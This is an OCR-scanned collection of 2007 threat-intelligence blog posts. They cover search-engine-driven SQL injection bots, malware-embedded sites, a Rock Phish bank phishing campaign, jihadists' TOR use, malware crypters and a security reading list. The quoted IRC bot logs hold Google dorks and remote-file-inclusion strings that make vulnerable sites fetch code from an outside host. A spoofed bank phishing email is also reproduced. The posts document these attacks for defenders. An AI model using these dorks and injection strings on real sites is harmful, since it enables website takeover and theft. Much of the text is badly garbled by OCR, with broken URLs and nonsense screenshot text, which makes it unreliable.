<Scan_Google> [milw@rm] Vivvo CMS <= 3.4 (index.php) Remote BLIND SQL Injection 
Exploit - http://www.milw6rm.com/exploits/4192 

<Scan_Google> [milw@rm] Pictures Rating (index.php msgid) Remote SQL Injection 
Vulnerbility - http://www.milw6rm.com/exploits/4191 

<Scan_Google> [milw@rm] Data Dynamics ActiveBar ActiveX (actbar3.ocx <= 3.1) 
Insecure Methods - http://www.milw6rm.com/exploits/4196 

<Scan_Google> [milw@rm] Expert Advisior (index.php id) Remote SQL Injection 
Vulnerbility - http://www.milw6rm.com/exploits/4189 


detected and simultaneously exploited 


- The scanning bots injects back the most popular web shell c99shell, so that ull control with 
UID based on the web server’s use privileges is gained 


- Hosting of malware embedded sites, phishing and spam pages, blackhat SEO taking advan- 
tage of the domain’s pagerank are among the few examples of how is the access abused 


These so called "[4]malicious economies of scale" showcase the following : 
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<B-Scan> | BiG) 1686 on 1242 sites 
|\<A-Scan> [CIGD 3696 on 5468 sites 
|\<haaaaaweee> tstring 


<A-Scan> | Bisetig| 
<B-Scan> | Biaeaig 


\<A-Scan> | Mea 3126 on S468 sites 

|<haaaaaweee> ta components/com_extended_registration/registration_detailed-.inc.php?mo 
sConfig_absolute_path= inurl:com_extended registration 

<eairupa | Dork] inurl:com_extended_registration 

Cc Eattpae| Bug] components/com_extended_registration/registration_detailed.inc.php?mos 
Config_absolute_path-= 

Eroruea| scan] Scanning started now? 

<A-Scan> | Penner inurl:com_extended_registration - 
components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolu 
te_path= 

<A-Scan> | Giiiy| inurl:com_extended_registration 
components/com_extended_ registration/registration_detailed.inc.php?mosConfig_absolu 


te_path= 
<B-Scan> 846 on 2186 sites 
<B-Scan> 1116 on 1242 sites 
<A-Scan> 3156 on 5468 sites 
|<B-Scan> 7 1148 on 1242 sites 
|<B-Scan> 11768 on 1242 sites 
|<B-Scan> 1266 on 1242 sites 


- botnet masters are using search engines to build a hitlist of easy to attack targets 


- anew command is gaining malware author’s attention, namely !milwOrm that is directly syn- 
dicating remotely exploitable web application vulnerabilities 


- approximately 10 to 15 sites got remotely SQL injected in the first minute of monitoring the 
bot 


- web application vulnerabilities continue to get a lower priority in an infosec budget 


- XSS vulnerabilities to actually have e-bank.com forward the captured information to a third- 
paty via a phishing attack undermine SSL certificates and the rest of the "yes, we’re working 
on it" security for the massess approaches 


- c99shell may be the most popular web shell, but taking into considerating the Web-ization of 
malware, and how a huge number of [5]web application backdoors remain undetected by anti 
virus software, botnet masters and malicious attackers are gaining competitive advantage in 
a very efficient way 


- botnet masters are not rocket scientiests, in some of the IRC channels used to control the scan 
bots, the administrators were so lame they were even allowing complete outsiders to perform 
scanning commands based on their preferences 


- despite that the majority of SQL injected sites are connected to a centralized web shell, even 
if it gets shut down, namely a home user somewhere across the world is acting as a C &C for 
the entire campaign, the site remains vulnerable and anything can make it "phone wherever 
they want to” 


- the botnet masters in this particular case were also interested in the FREE SPACE they have 
available at the exploited domains 


What are the search engines doing to tackle the search engine hacking possibilities, especially 
Google being the 
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* Set by uyx on Mon Jul 16 16:55:45 


<[18]Engin3s|614631> (@ Exploiting:2646 of 2792 

<[18]Engin3s|22464> (@ @ 

<[18]Engin3s|247561> @ Exploiting:66 of 292 

<adya_putri> @ Exploiting:1568 of 1575 

<[18 ]JEngin3s | 12753> @Vulnerable) (ON http://www. "_ .com//benarket/postscript/pos 
tscript.php?p_mode http:// hale r6.txt? 

<[18 ]Engin3s|937228> @ Exploiting:1656 of 2767 

<[18]Engin3s|12753> (@ Exploiting:1656 of 2761 

<[18 ]Engin3s | 74686 6> @Vulnerable) (ON http://www. _ con//bemarket/postscript/po 
stscript .php?p_mode=http-:/ r6.txt? 

<[18 ]Engin3s | 74686 6> @ Exploiting:1658 of 2782 

<[18 ]Engin3s | 666939> (8) (668) (8) (8) (288) (33) 

(6) (8) (218) (645) (8) (268) (1268) 
(568) (1566) (8) (368) (8) 

<[18 ]Engin3s | 666939> @ :5568 

<[18 ]Engin3s|666939> @ 768 

<[18]Engin3s|937228> (@Uulnerable) (oN http://www. *” -con//bemarket/postscrip 
t/postscript .php?p_mode http://; r6.txt? 

<[18 ]JEngin3s |12753> @Uulnerable)(0N http://www. -com//benarket/postscript 
/postscript.php?p_mode http:// JRO ckeue 

<[18 JEngin3s | 746866> @Vulnerable) (ON http://www. -con//bemarket/postscrip 
t/postscript.php?p mode=http:// 'r6 txt? 


most widely used and having the most comprehensive index? They’re successfully [6]imple- 
menting CAPTCHA’s for such suspicious scanning bot behaviour : 


"At [7]ACM WORM 2006, we published a paper on [8]Search Worms [PDF] that takes a much 
closer look at this phenomenon. [9]Santy, one of the search worms we analyzed, looks for 
remote-execution vulnerabilities in the popular phpBB2 web application. In addition to ex- 
hibiting worm like propagation patterns, Santy also installs a botnet client as a payload that 
connects the compromised web server to an IRC channel. Adversaries can then remotely con- 
trol the compromised web servers and use them for DDoS attacks, spam or phishing. Over 
time, the adversaries have realized that even though a botnet consisting of web servers pro- 
vides a lot of aggregate bandwidth, they can increase leverage by changing the content on 
the compromised web servers to infect visitors and in turn join the computers of compromised 
visitors into much larger botnets." 


It will not solve the parsing approach scanning bots are implementing, so | think that in the 
short term a database of google hacking searches may indeed get a CAPTCHA verification by 
default. An IP reputation system has a lot of potential too, and with [10]Google’s acquisition 
of Postini, they already have a huge population of IPs you should not trust for anything. My 
expirience shows that once you get a phishing email from a single IP, you will sooner or later 
see the same IP hosting and sending malware, hosting as well as sending spam, and pretty 
much anything malicious. 


1. http: //ddanchev . blogspot . com/2007/05/google~hacking-for-vulnerabilities html 

2. htp:/ /adanchev. blogspot. con/2006/09/google-hacking-for~cryptographic. ha 

3. http: //ddanchev. blogspot .com/2006/05/nation-wide-google-hacking-initiative.htm 

4. http: //ddanchev. blogspot . com/2007/03/underground- economys~supply- of- goods . html 

5, itep://adanchey. blogspot coa/207/08/conptiation of web backdoors 

6. hep: //googleonlinesecurity.blogspotcom/2001/07/reason-behind-vere-sorzy-nessage hia 
RRO R TOT ET 

2) oe eR STE 

0, hvtp://en. wikipedia. org/+iki/Saxty 


. http: //www.eecs.umich.edu/~farnam/worm2006 .htm 


ttp://www.forbes.com/technology/2007/07/09/google-postini-email-tech-cx_ag_0709postini.htm 


3.7.12 Malware Embedded Sites Increasing (2007-07-25 17:26) 


Position Malware Percentage 
1 Maliframe ee 65.5% 
2 JS/EnciFra Mi 6.9% 
3 Troj/Decdec aa 6.5% 
4 Troj/Fujif 3.7% 

5 Trojifrady 3.0% 

6 VBS Redlot Wi 2.2% 

7 MalVObtJS a 1.8% 

8 TrojPsyme 1.2% 

q VBSiRoot 11.0% 

10 VBS/Soraci 10.9% 
Others 7.3% 


The emerging trend of malware embedded sites 


Malware embedded web sites are steadily gaining a priority in an attacker’s arsenal of infection 
and propagation vectors, and we’ve been witnessing the trend for over an year and a half now. 
Malware authors seem to have found an efficient way to hijack, inject and exploit legitimate 
sites or Web 2.0 services in order to serve the obfuscated payload which is no longer purely 
relying on [1]social engineering tactics, but is basically exploiting unpatched client side 
vulnerabilities to infect the visitors. Also, malware authors seem to have started thinking as 
true marketers, taking into consideration that a visitor will go through a potentially malware 
embedded site only once and wouldn't visit it given the lack of content - blackhat SEO garbage 
- so that they’ve stopped relying on having a malicious site exploit a single vulnerability only, 
and started hosting multi-browser, multi-third-party malware embedded sites, thus achieving 
malicious economies of scale. Here’s a great summary courtesy of Sophos showcasing the 
[2]increasing number of sites with malware embedded payload : 


"The figures compiled by Sophos’s global network of monitoring stations show that infected 
web pages continue to pose a threat, affecting official government websites as well as other 
legitimate pages. On average this month, Sophos uncovered 9,500 new infected web pages 
daily - an increase of more than 1000 every day when compared to April. In total, 304,000 web 
pages hosting malicious code were identified in May." 


The stats are a great wake up call for those still believing that malware comes in the form of 
executables and is 
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Scanner results. 
Scan taken on 24 Jul 2007 10:58:10 (GMT) 
4-Squared| Found Trojan-Downloader.JS.Agent.fb 
Antivir] Found TR/Didr.Agent.FB.2 
Arcavir| Found Trojan.Downloader.Js.Agent.Fb 
Avast] Found nothing 
AVG Antivirus} Found nothing 
BitDefender] Found Trojan.Downloader.BBX (probable variant) 
Clamaé¥} Found nothing 
CPsecure} Found nothing 
Dr.Web| Found ¥BS.Psyme.433 
F-Prot Antivirus| Found nothing 
F-Secure Anti-Virus} Found Trejan-Downloader.JS.Agent.fb 
Fortinet] Found JS/Psyme.DET!tr 
Kaspersky Anti-Virus} Found Treojan-Downloader.JS.Agent.fb 
NOD32| Found JS/Exploit.ADODB.Stream.AF 
Norman Virus Control] Found nothing 
Panda Antivirus} Found nothing 


Rising Antivirus| Found Trojan.DL.¥VBS.Agent.coj 


Sophos Antivirus| Found Mal/Psyme-A& 
VirusBuster| Found nothing 
VBA32| Found Exploit.JS.ADODB.Stream.af 


mostly using email as propagation and infection vector. Moreover, [3]these stats show great 
similaties with the ones released by ScanSafe an year ago whose conclusion was that based 
on 5 billion web requests there was once piece of malware hosted on 1 of every 600 social 
networking pages. Furthermore, [4]Finjan’s latest Web Security Trends Report indicates the 
rise of evasive web malware that is aiming at making cyber forensics of malware embedded 
sites like the ones | provided you with in previous posts, harder to conduct. 


Malware embedding techniques 


- vulnerabilities within popular traffic aggregators and web 2.0 darlings have a huge potential, 
but a major downsize from an attacker’s perspective - they’re like sending several hundred 
pieces of zero day malware to couple of million emails, thus having [5]Janti virus vendors and 
the security community detect the malware outbreak and react accordingly 


- a pull approach consisting of [6]blackhat SEO on popular searches, or any strategy related 
to seducing the end user’s desire for "free lunch" online while abusing it. We’ve already seen 
[7]automated spamming attacks at the .EDU domain in order to harness the power of a univer- 
sity site’s pagerank so that the malicious sites get higher priority in search engines 

- a push approach - [8]via spam and [9]phishing emails, a digital greed so that in case the 
attackers cannot trick you into giving them your accounting and financial data, they'll infect 
you with malware in between, a trend which I’m seeing recently. Basically, you have a fake 
PayPal phishing page hosting malware in between the scam 

- passive - using advertising networks are infection vectors, basically a fake but reputable look- 
ing service or product centered site is set up, an advertising budget on a CPC basis is consid- 


942 


ered, and even though you may visit Yahoo.com an ad appearing at the top though a third-party 
advertising network may indeed turn out to be one loading a malicious payload. We’ve already 
seen this malicious cycle with zero day vulnerabilities trying to take the maximum advantage 
out of the window of opportunity of a certain vulnerability, and despite that zero day vulner- 
abilities are greatly desired by malware authors, the plain simple truth whose effectiveness 
we've seen with MPack is that the attack was a very successful one given it was abusing old 
vulnerabilities. So, if the end user doesn’t patch, [10]an old and already patched vulnerability 
has the same value as a zero day one, isn’t it? 


Scanner results 


Scan taken on 24 Jul 2007 11:01:35 (GMT) 


4-Squared 

Antivir 

Arcavir 

Avast 

AVG Antivirus 
BitDefender 

ClamAV 

CPsecure 

Dr.Web 

F-Prot Antivirus 
F-Secure Anti-Virus 
Fortinet 

Kaspersky Anti-Virus 
NOD32 

Norman Virus Control 
Panda Antivirus 
Rising Antivirus 
Sophos Antivirus 
VirusBuster 

VBA32 


Found nothing 
Found nothing 
Found nothing 
Found nothing 
Found nothing 
Found nothing 
Found nothing 
Found nothing 
Found nothing 
Found nothing 
Found nothing 
Found nothing 
Found nothing 
Found nothing 
Found nothing 
Found nothing 
Found nothing 
Found nothing 
Found nothing 
Found nothing 


Why are malware embedded web sites increasing? 


- Web application vulnerabilities exploited in an automated fashion make it possible for mali- 
cious attackers to inject malicious pages within domains with high page rank and ones attract- 
ing lots of traffic. In a previous post | provided various screenshots of [11]an IRC controlled bot 
google hacking for vulnerabilities and injecting web shells to take control over the vulnerable 
sites. Next time it could logically be [12]web backdoors making it harder for the exploited party 
to react given the perimeter defense myopia they’re still living in 


- [13]DIY malware kits make it possible for virtially anyone to embed malware on a web page. 
In my "[14]Future Trends of Malware" publication | emphasized on how open source malware is 
undermining the entire singnatures based detection model, at least in respect of timing. Open 
source malware evolved into [15]open source exploitation and statistics tools, thus lowering 
the entry barriers into the malware area for anyone who has obtained the source code of 
these kits. It’s even more interesting to note that given the open source nature of the kits, 
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modifications are already getting traded and used in the wild, so basically, the MPack kit we 
know of last month is someone elses’s advanced malware distribution platform next month. 
Anyway, going through an interview with the authors of MPack, I’d rather say - a little less who, 
and a little bit more on what’s to come in this space, would be a wise approach 


- Malicious pages hosting service on usually compromised servers on purposely ignoring "take 
down notices" to further extend the window of opportunity for someone to visit and get infected. 
Various vendors such as [16]RSA and [17]NetCraft are already developing a market segment 
for timely shutting down such phishing and malware hosting web sites, and by the time the 
service scales enought I’d be very interested in seeing some averages based on the time it 
took them to shut down such a site 


- A logical move exploiting the overall lack of awareness from the end user’s part on how client 
side vulnerabilities result in malware infections compared to potentially malware infected down- 
loads as it used to be in the past, a very tricky situation by itself taking into consideration the 
future growth of E-commerce. With [18]end users becoming more privacy conscious, and the 
countless users who wouldn’t purchase anything only for more than $50 let’s say, trying to 
communicate to them that malware can be found on literally any web site and that it’s not 
longer coming in the typical binary nature they’re used to, could undermine their confidence 
in E-commerce even more 


- [19]Malicious economies of scale, a phrase | coined to bring the discussion at another level, 
namely, that malware authors are putting less efforts but achieving a higher level of produc- 
tivity, greatly represents the concept of malware embedded sites 


[20]Here are more articles presenting [21]Jother points of [22]view on the topic. 
Related posts: 

[23]Massive Embedded Web Attack in Italy 

[24]The MPack Attack Kit on Video 

[25]Exploits Hosting Domains 

[26]Exploits Hosting Domains - Part Two 

[27]An Analysis of ms-counter.com 

[28]The WebAttacker in Action 


cep eaaae toga con/2001 et acta eugtaner ine etcmaemee cad 
2. tp: ows. sophos. con/pressotfice/nevs/articles/2007/06/optenmaj07 tml 

3. http: //ddanchev. blogspot . com/2006/08/malware-statistics-on-social . html 

http: //finjan.com/Pressrelease.aspx? id=1527&%PressLan=1230&lan= 

Shep: / /ddancnev. blogspot. con/2007/06/arly-varning-security-eveataystens tal 
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http: //ddanchev. blogspot .com/2007/01/attack- of -seo-bots-on-edu-domain. html 
8. http: //ddanchev. blogspot .com/2007/01/inside-email-harvesters-configuration.htm 
9. http: //ddanchev. blogspot .com/2007/04/shots-from-malicious-wild-west-sample.htm 


10. http: //ddanchev.blogspot .com/2007/07/zero-day-vulnerabilities-auction. htm 


. http: //ddanchev.blogspot.com/2007/07/sql-injection-through-search-engines .html 


12. http://ddanchev.blogspot .com/2007/04/compilation-of-web-backdoors .htm 


. http: //ddanchev. blogspot .com/2007/04/shots-from-malicious-wild-west-sample_20.htm 


17. http: //ddanchev. blogspot .com/2007/03/take-this-malicious-site-down.htm 


18. http://ddanchev. blogspot .com/2007/07/e-commerce-and-privacy.htm 
19. http://ddanchev. blogspot . com/2007/03/underground-economys- supply-of-goods. htm 


20. http://www.securecomputing. net .au/feature/3638 , malware-finds-a-new-home. aspx 

21. http://www. informationweek.com/news/showArticle. jhtml?articleID=200001941 

22. 
23. http: //ddanchev. blogspot . com/2007/06/massive-embedded-web-attack-in-italy.htm 

24, 

25. 


26. http: //ddanchev. blogspot . com/2007/06/exploits-serving-domains-part-two.htm 
27. http://ddanchev. blogspot . com/2007/03/shots-from-malicious-wild-west-sample. html 


28. http://ddanchev. blogspot .com/2007/05/webattacker-in-action.htm 


3.7.13 Confirm Your Gullibility (2007-07-26 11:43) 


@O-« i > httplogin internetbankingzone. biz (€~ > i 5 itp vMogin intemetbankingzone bid CamaPenedes/data tt 
Name ast moor 
Codi de client 1 nom d'usuari: 4132 
Clau d'entrada: 4132 
© Barclays/ 21-Oct-2005 11:21 Security: 1432 
Oo Cai xaPenedes/ Po ces a tan epee rn cen a re ac 
Codi de client 1 nom d'usuari: test 
ed _cpnl/ 01-Mar-2006 15:17 Clau d‘entrada: test 
© attiance- leicester/ 03-Mar-2006 21:05 | Security: test 
© bankofcyprus/ 08-Nov-2005 05:32 Codi de client i nom d'usuari: pepito 
& bankofscotLand/ 03-Mar-2006 11:09 Clau d'entrada: pepito 
Security: pepito 
© banortes Ce eR Beet 26h) -05 ee 
2005 O86: Codi de client 1 nom d'usuari: sd2345 
~! Libane. 20-Ont: cos Clau d'entrada: 122455 
i] cahoots 31-May-2005 12:50 Security: 13345 
ss bank/ BO: ae Codi de client i nom d'usuari: jejeje... nadie pica! 
commbank / 09-Feb-2008 04:52 | Clau d'entrada: dddddddddddd 
© credem ideas Wate: | re re re otczuass 
oS creyal/ 28-Oct-2005 09:08 Codi de client 1 nom d'usuari: test 
2 Clau d'entrada: test 
data. txt 03-Mar-2006 11:08 | Security: test 
@ takes, 03-Mar-2006 11:09 a ae ag a Se > SPE a 
Q Codi de client i nom d'usuari: pepito 
fineco/ 17-Jul-2005 11:14 | clau d'entrada: pepito 
© gruppocarige/ 29-Oct-2005 09:44 Security: pepito 
GD halifax 03-Mar-2006 11:10 Codi de client i nom d'usuari: sd2345 
0 Clau d'entrada: 122455 
hsbe_uk/ 12-Jan-2006 14:10 : 
= Security: 13345 
oO Lloyds/ BO-Bov- ROSS IUCR, | aceeeeacecsencenceeeacsemeemecnes 
: . Codi de client i nom d'usuari: jejeje... nadie pica! 
nationwide/ *Mar-2006 11: 
- sani! 24:20 | Clau d'entrada: dddddddddddd 
© owolbs 23-Oct-2005 06:59 | Security: dddddddddddd 
ae) posthank/ 09-Mar-2006 21:44 
Qo rasbank/ 27-Oct-2005 11:59 
Oo rbsdiaital/ 03-Mar-2006 11:10 
ia santander/ 26-Feb-2006 02:10 
o scotiabank/ 26-Feb-2006 00:12 
© unicredit/ 15-Sep-2005 13:27 
o woolwich/s 17-Oct-2005 11:17 
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The Rock Phish kit in action. Registered yesterday, a .info domain is faking a Royal Bank of 
Scotland Customer Confirmation Form, and is a great indication on the convergence of spam 
and phishing, part of [1]the phishing ecosystem in terms of cooperation. 


Message source spoofed from : corporateclients.refj2225451hh.ib @ rbs.co.uk 


Message content : Dear Royal Bank of Scotland customer, 

The Royal Bank of Scotland Customer Service requests you to complete Digital Banking 
Customer Confirmation Form (CCF). This procedure is obligatory for all customers of the Royal 
Bank of Scotland. Please select the hyperlink and visit the address listed to access Digital 
Banking Customer Confirmation Form (CCF). Again, thank you for choosing the Royal Bank of 
Scotland for your business needs. We look forward to working with you. ***** Please do not 
respond to this email *****This mail is generated by an automated service. 


Sender’s IP : Listed by only one of the popular anti-spam blacklists 
Domain info : buhank.info ; 81.215.226.34 ; Created On: 25-Jul-2007 18:53:03 UTC ; Expiration 
Date: 25-Jul-2008 18:53:03 UTC. 


HTTP/1.1 200 OK 

Date: Wed, 25 Jul 2007 22:21:30 GMT 

Server: Apache/1.3.37 (Unix) mod _ssl/2.8.28 OpenSSL/0.9.7f PHP/4.4.4 
mod _perl/1.29 FrontPage/5.0.2.2510 

Last-Modified: Tue, 26 Jun 2007 19:05:56 GMT 

ETag: "e6c64f-23f9-46816394" 

Accept-Ranges: bytes 

Content-Length: 9209 

Content-Type: text/html 


Main index returns "209 Host Locked" message typical for Rock Phish. 


Phishing URL : sessionid-02792683.rbs.co.uk.buhank.info/customerd irectory/direct/ccf.aspx 
Original URL : ros.co.uk/Bank _Online/logon to digital _banking/default.asp 
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CEL LS CL 


psbl.surriel. com Listed: 127.0.0.2 


It’s cost-effective not to register a phishing domain for longer than an year, given its "lifetime", 
that’s for sure. Having your own certificate authority is even better, given they’ve actually 
implemented it since there’s no httpS option available, thus this phishing campaign is doomed 
to failure. And while the message and the spoofed site look relatively decent, the people 
behind this phishing campaign are newbies using the Rock Phish phishing kit. Efficiency of 
DIY phishing kits VS the quality of the phishing site. [2]More info on this [3]campaign and 
[4]Rock Phish, as well as SpamHaus.org’s recent efforts on [5]limiting the lifetime of Rock 
Phish domains. 


Rock Phish screenshot courtesy of [6]Fortinet. 


Related posts : 

[7]Phishing Domains Hosting Multiple Phishing Sites 
[8]Interesting Anti-phishing Projects 

[9]Taking Down Phishing Sites - a Business Model? 
[10]Take this Malicious Site Down - Processing Order.. 
[11]Anti-phishing Toolbars - Can You Trust Them? 


1 

| 
ttp://www.castlecops.com/Rock_Phish_Royal_Bank_of_Scotland_phish503829.htm 

| 

i 

| 


http: //ddanchev. blogspot .com/2006/12/phishing-domains-hosting-multiple.htm 


ttp://ddanchev.blogspot.com/2006/09/interesting-anti-phishing-projects.htm 
http: //ddanchev.blogspot .com/2007/04/taking-down-phishing-sites-business. htm 
. http://ddanchev. blogspot .com/2007/03/take-this-malicious-site-down.htm 


. http://ddanchev. blogspot .com/2006/03/anti-phishing-toolbars-can-you-trust.htm 
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3.7.14 Cyber Jihadists’ and TOR (2007-07-26 20:08) 


_) ae SAP wp Be 


Fing IP Assress Count i &he ™ 
aoe el! aay G8 
yen A eal pt gS cgth sliily 


Your IP is 213. 


HIDE YOUR IP 


Your Country is: 


Remote IP Tracker™ 


ForMylIP.com” 


Quick and easy way to find your IP address. 


Soyer Suit 


SI lee grea gt 53! hg 
Sas eat JS ty 


You’ve always knew it, I’ve always speculated on it, now | can finally provide a decent 
screenshot of cyber jihadist’s howto recommending and taking the average reader step by 
step through the process of obtaining and using TOR - a "rocket science" by itself. Following 
previous comments regarding [1]Jinadists’ Anonymous Internet Surfing Preferences | also 
pointed out on the obsolesence of [2]Samping Jihadist IPs at various forums and sites, as 
it’s both obvious and logical to consider that surfing, reconnaissance and communication is 
happening in a tunneled nature. 


Related posts: 

[3]Cyber Traps for Wannabe Jihadists 
[4]Mujahideen Secrets Encryption Tool 

[5]The Current State of Internet Jihad 
[6]Characteristics of Islamist Web Sites 

[7]A List of Terrorists’ Blogs 

[8]An Analysis of the Technical Mujahid Issue One 
[9]An Analysis of the Technical Mujahid Issue Two 
[10]Terrorist Groups’ Brand Identities 


1. http: //ddanchev. blogspot .com/2007/05/jihadists-anonymous- internet- surfing. htm 


. http: //ddanchev. blogspot .com/2007/05/sampling-jihadists-ips.htm 
. http: //ddanchev. blogspot .com/2007/03/cyber-traps-for-wannabe- jihadists. htm 


http: //ddanchev. blogspot .com/2007/04/mujahideen-secrets-encryption-tool .htm 


http: //ddanchev. blogspot .com/2006/12/current-state-of-internet- jihad. html 


Au RWN 


http: //ddanchev. blogspot .com/2007/02/characteristics-of-islamist-websites.html 
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7. http://ddanchev. blogspot . com/2007/06/list-of-terrorists—blogs.htm 


8. http: //ddanchev. blogspot .com/2006/12/analysis-of-technical-mujahid-issue-one.htm 
9. http: //ddanchev. blogspot .com/2007/06/analysis-of-technical-mujahid-issue-two.htm 


10. http://ddanchev. blogspot .com/2007/07/terrorist-groups—brand-identities.htm 


3.7.15 More Malware Crypters for Sale (2007-07-26 20:29) 


Ie 25.2 Jens 
Filesize 
[Status Idle... Oukput Size 20.10 KB } 
cm) - Add File Lok) o * 
Filename: jj i Filename: [ 7] 
Encryption || Memory Execution Encryption Memory Execution 


{V Encryption 


( Execute in own memory Custom Encryption 


( Execute in default browser's memory Maximum Encryption Layer: [50 
© Do not execute in memory 
Minimum Encryption Layer : 2s [%4] 
Drop file to directory: |C:\ Menu Encryption Password : @“ypE27 R 


[ Execute/Load file after dropping (txt, jpg, etc) 


[~ Execute/Load file visible (no hide window) f° RC4 Encryption 


Encryption Password : @“ypE2* R 


>, 
[~ Scramble file with |1024 [x4] bits [~ NTDLL's Compression API (rtiCompressBuffer) 


Add File Add File 


There’s an [l]ongoing trend among malware authors to either code malware crypters and 
packers from scratch and sell then at a later stage, or even more interesting, obtain publicly 
available crypters source code, modify, add extra featured and new encryption routines and 
make them available for sale. [2]The rise of DIY malware crypters enables literally everyone 
to fully obfuscate an already detected piece of malware, so that if no extra security measures 
but only virus signatures scanning are in place, an infection takes place. 


The first crypter has the following options : 


- Memory execution/injection within its own process, execute in a default browser’s memory, 
or no execution in memory takes place but dropping 


- Custom encryption with min and max encryption layers, RC4, and NTDLL Compression API 


The second crypter, a previous version of the first one, has the following 
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1 
[J 


= File a] ADOLIE 


Filename 


Encryption | Compress... Resource... Memory E... | Scramble | Parameter 


=] Add File 
Filename : | Browse | 
Parameters: 


Encryption 7 
(* Use custom encryption Encryption Layer Min [20 


Encryption Layer Max [50 


Status: Waiting. ., 


© Use RC4 encryption 


Password|>@_NcQ S| 
. Compress files using ntdll's compression. (NT only) 

[ Use custom resource name [GEFXJE | 
. Dont run file in memory. Drop in |%windir% 2| 


. Scramble! |1024 bits, 
[- Start file visible 


Cancel | Add file | 


options : 

- custom resource names 
- scramble 

- custom encryption layer 


Moreover, realizing the 


ongoing 


[= (ox) 


competition among 


Crypter 1.1 


Stub File 


Filename 
File Contains EOF bata 
[| Change Ieon 


coders or modifyers of 


malware crypters, services such as already packed dozens of bots often act as a bargain in 


case of a possible and much more flexible purchase. The third crypter is a perfect example of 
a source code modification since its lacking any significant and unique features. 


The most dangerous threat, however, remains your lack of decent [3]situational awareness. 


1. http: //www.packetstormsecurity.org/papers/general/malware-trends. pdf 

2. http: //ddanchev. blogspot .com/2007/07/multi-feature-malware-crypter .htm 
3. http: //ddanchev. blogspot .com/2006/09/cyber-intelligence-cyberint.htm 
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3.7.16 Delicious Information Warfare, Saturday, 28th (2007-07-28 12:30) 


Here are some of the most interesting security papers, tools and services | stumbled upon 
during the week. Enjoy, and stay informed! 


Papers and Publications : 


- [1]Exploiting the iPhone - Paper + Video 

"Shortly after the iPhone was released, a group of security researchers at [2]Independent 
Security Evaluatorsdecided to investigate how hard it would be for a remote adversary to 
compromise the private information stored on the device. Within two weeks of part time 
work, we had successfully discovered a vulnerability, developed a toolchain for working with 
the iPhone’s architecture (which also includes some tools from the #iphone-dev community), 
and created a proof-of-concept exploit capable of delivering files from the user’s iPhone to a 
remote attacker. We have notified Apple of the vulnerability and proposed a patch. Apple is 
currently looking into it." 


- [3]The Evolution of GPCode/Glamour RansomWare 

"This report contains a description of the more obscure, previously undocumented traits 
belonging to the GPCode/Glamour trojan. The code is a modified version of the Prg/Ntos family 
which was detailed in depth during our Encrypted Malware Analysis in November 2006. While 
a majority of the functionality has not changed since then, this recent variant is distinctive 
enough to warrant additional research. In 

particular, the trojan is now equipped with the ability to encrypt a victim’s files on disk. The 
motive for adding this feature is clearly monetary, as the victim is advised that the files will re- 
main encrypted unless $300 is turned over to the authors, in exchange for a decryption utility." 


- [4]JA Guide to Security Metrics 

"In the face of regular, high-profile news reports of serious security breaches, security man- 
agers are more than ever before being held accountable for demonstrating effectiveness 
of their security programs. What means should managers be using to meet this challenge? 
Some experts believe that key among these should be security metrics. This guide provides 
a definition of security metrics, explains their value, discusses the difficulties in generating 
them, and suggests a methodology for building a security metrics program." 


- [5]Secure File Deletion - Fact or Fiction? 

"This paper will deal with how and where some of these files are created and how to securely 
remove them from a system. Microsoft Windows operating systems and associated applica- 
tions will be the main focus. This paper is divided into two main sections, the first section is 
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designed to be a primer on the types of information that can be found on a hard drive. It is not 
designed to be a fully detailed data recovery/computer forensics tutorial, but is designed to 
show security professionals how much information can be found on a hard drive. The second 
section deals with the concepts behind securely deleting files and associated data from a hard 
drive." 


- [6]Group Policy Extensions in Windows Vista and Windows Server 2008 - Part 1 
"Some of the more useful new group policy settings included in Windows Server 2008 and 
Windows Vista." 


- [7]Hooking CPUID - A Virtual Machine Monitor Rootkit Framework 

"One of the fascinating debates taking place around the web is whether or not an OS can 
detect if it is running inside a VM. Surely a VMM will never be able to fool an external clock 
but discounting that, who knows? In any regard, | have written a small VMM that attempts 
to place the host OS into a VM and then handles the basic subset of unconditional VM-exits. 
Great. Now what?" 


- [8]BIND 9 DNS Cache Poisoning 

"This weakness can be turned into a mass attack in the following way: (1) the attacker 
lures a single user that uses the target DNS server to click on a link. No further action 
other than clicking the link is required (2) by clicking the link the user starts a chain reac- 
tion that eventually poisons the DNS server?s cache (subject to some standard conditions) 
and associates fraudulent IP addresses with real website domains. (3) All users that use this 
DNS server will now reach the fraudulent website each time they try to reach the real website." 


- [9]Secure Programming Best Practices for Windows Vista Sidebar Gadgets 

"Today, the Windows Vista Sidebar hosts Gadgets built from HTML, JavaScript, and potentially 
ActiveX controls, and because Gadgets are HTML, they are subject to Cross-site Scripting style 
bugs. These bugs are extremely serious because script in the Sidebar is capable of running 
arbitrary code in the context of the locally logged-on user. This document outlines some of 
the secure programming best practices that should be considered when building Windows 
Vista Sidebar Gadgets." 


- [10]Wardriving Bots 

"wardriving-bot’s are autonomous systems that are installed in a train, car, bus, taxi or truck 
and collect wardriving data’s, like SSID, GPS-data, MAC address and all other stuff, that kismet 
can handle. after collecting this data, encrypting, the bot try to send this information back to 
the Bot-Handler with using a "open" accespoint or a HotSpot." 


- [LL]KYE: Fast-Flux Service Networks 

"This whitepaper details a growing technique within the criminal community called fast-flux 
networks. This is an architecture that builds more robust networks for malicious activity while 
making them more difficult to track and shutdown. This is the first KYE paper we are releasing 
in both .pdf and .htm! format." 


Security Tools : 


- [12]Atsiv v1.01 - load, list and unload signed or unsigned drivers on 32 and 64 bit ver- 
sions of Windows XP, 2K3 and Vista 
"Atsiv is a command line tool that allows the user to load and unload signed or unsigned 
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drivers on 32 and 64 bit versions of Windows XP, Windows 2K3 and Windows Vista. Atsiv is 
designed to provide compatibility for legacy drivers and to allow the hobbyist community to 
run unsigned drivers without rebooting with special boot options or denial of service under 
Vista." 


- [13]Secunia Personal Software Inspector - Checks Over 4,200 Applications for Latest 
Patches 

"The Secunia PSI detects installed software and categorises your software as either Insecure, 
End-of-Life, or Up-To-Date. Effectively enabling you to focus your attention on software 
installations where more secure versions are available from the vendors." 


- [14]HIHAT - High Interaction Honeypot Analysis Toolkit 

"The High Interaction Honeypot Analysis Toolkit (HIHAT) allows to transform arbitrary PHP ap- 
plications into web-based high-interaction Honeypots. Furthermore a graphical user interface 
is provided which supports the process of monitoring the honeypot and analysing the acquired 
data." 


- [15]GPCode Ransom Trojan Decoder 

"Recent reports of GPCode, a Ransom Trojan that encrypts files and asks for $300.00 to unlock 
the victim files have been hitting headlines in the news. Secure Science has offered a freely 
available decoder for freeing up the files without any problems. This program was written as 
